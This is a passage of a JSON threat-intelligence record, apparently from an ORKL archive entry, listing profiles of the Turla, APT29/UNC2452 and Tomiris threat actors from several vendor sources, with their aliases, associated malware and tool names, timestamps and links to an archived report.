		"109552"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "493c47f7-b265-4b10-95de-d86af942c543",
			"created_at": "2023-04-27T02:04:45.385041Z",
			"updated_at": "2026-04-10T02:00:04.939878Z",
			"deleted_at": null,
			"main_name": "Tomiris",
			"aliases": [],
			"source_name": "ETDA:Tomiris",
			"tools": [
				"JLOGRAB",
				"JLORAT",
				"Kapushka",
				"KopiLuwak",
				"Meterpreter",
				"QUIETCANARY",
				"RATel",
				"RocketMan",
				"Roopy",
				"Telemiris",
				"Tomiris",
				"Topinambour",
				"Tunnus",
				"Warzone",
				"Warzone RAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29 ",
				"ATK7 ",
				"Blue Kitsune ",
				"Cozy Bear ",
				"The Dukes",
				"UNC2452 ",
				"YTTRIUM "
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433988,
	"ts_updated_at": 1775792253,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/efb90cc230f9f566fd7dc3a0bfbc45a8ecaa65d9.pdf",
		"text": "https://archive.orkl.eu/efb90cc230f9f566fd7dc3a0bfbc45a8ecaa65d9.txt",
		"img": "https://archive.orkl.eu/efb90cc230f9f566fd7dc3a0bfbc45a8ecaa65d9.jpg"
	}
}